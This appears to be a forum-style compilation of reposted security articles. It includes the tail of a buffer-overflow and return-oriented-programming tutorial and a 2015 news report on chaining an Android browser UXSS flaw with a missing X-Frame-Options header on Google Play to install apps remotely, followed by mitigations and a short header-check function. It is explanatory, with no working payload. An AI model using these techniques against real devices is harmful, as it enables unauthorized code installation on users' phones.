si
x/10i 0x400470

GDB helpfully places the code deterministically, though the location it chooses differs slightly from the shell's choice when ASLR is disabled.

Transcripts

I've summarized the above in a couple of shell scripts:

classic.sh: the classic buffer overflow attack.
rop.sh: the return-oriented programming version.

They work on my system (Ubuntu 12.04 on x86_64).

Sursa: http://crypto.stanford.edu/~blynn/rop/
24. How to remotely install malicious apps on Android devices

by Pierluigi Paganini on February 13th, 2015

Security researchers discovered how to install and launch malicious applications remotely on Android devices by exploiting two flaws.

Security researchers have uncovered a couple of vulnerabilities in the Google Play Store that could allow cyber criminals to install and launch malicious apps remotely on Android mobile devices. Tod Beardsley, technical lead for the Metasploit Framework at Rapid7, explained that attackers can install any arbitrary app from the Play Store onto a victim's device, even without the user's consent. This is possible by combining the exploitation of an X-Frame-Options (XFO) vulnerability with an Android WebView (Jelly Bean) flaw.

The flaw affects mobile devices running Android version 4.3 Jelly Bean and earlier; devices running third-party browsers are also vulnerable. The researcher reported that the web browser in Android 4.3 and prior versions is vulnerable to a Universal Cross-Site Scripting (UXSS) attack, while the Google Play Store is vulnerable to a Cross-Site Scripting (XSS) flaw. In the UXSS attack scenario, hackers exploit client-side vulnerabilities affecting a web browser or browser extensions to run an XSS attack, which allows the execution of malicious code bypassing security protection mechanisms in the web browser.

"Users of these platforms may also have installed vulnerable aftermarket browsers," Beardsley wrote in a blog post on Tuesday. "Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the ones most at risk.
Other browsers may also be affected." "Until the Google Play store XFO [X-Frame-Options] gap is mitigated, users of these web applications who habitually sign in to their Google Account will remain vulnerable."

The expert provided JavaScript and Ruby code that could be used to get a response from the play.google.com domain without an appropriate XFO header.

Rapid7 has already published a Metasploit module to exploit the flaw, Module for R7-2015-02 #4742, which has been made public on GitHub.

"This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce an X-Frame-Options: DENY header (XFO) on some error pages, and therefore can be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, as any application available on the Google Play store can be installed and launched on the user's device. This module requires that the user is logged into Google with a vulnerable browser." reads the advisory.

To mitigate the security issue:

Use a web browser that is not affected by UXSS flaws (e.g. Google Chrome, Mozilla Firefox, or Dolphin).
Log out of the Google Play Store account in order to avoid the vulnerability.

Pierluigi Paganini (Security Affairs – Google Android, hacking)

Sursa: http://securityaffairs.co/wordpress/33456/hacking/remotely-hack-android.html
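The researcher's original JavaScript and Ruby snippets are not reproduced in this repost. As a hedged illustration only, the header check they relied on boils down to something like the following; the function name and logic are mine, not Rapid7's:

```python
def frameable(headers):
    """Return True if a response with these headers can be loaded in an iframe.

    A page is protected from cross-origin framing only if it sends
    X-Frame-Options: DENY or SAMEORIGIN. The Play Store error pages at
    issue sent no such header at all, so an attacker's page could frame
    them and, via the UXSS bug, script them.
    """
    xfo = {k.lower(): v for k, v in headers.items()}.get("x-frame-options")
    return xfo is None or xfo.strip().upper() not in ("DENY", "SAMEORIGIN")

# A hardened page:          frameable({"X-Frame-Options": "DENY"})  -> False
# The vulnerable pages:     frameable({"Content-Type": "text/html"}) -> True
```

A real probe would issue a request to a Play Store error page and run this check over the response headers.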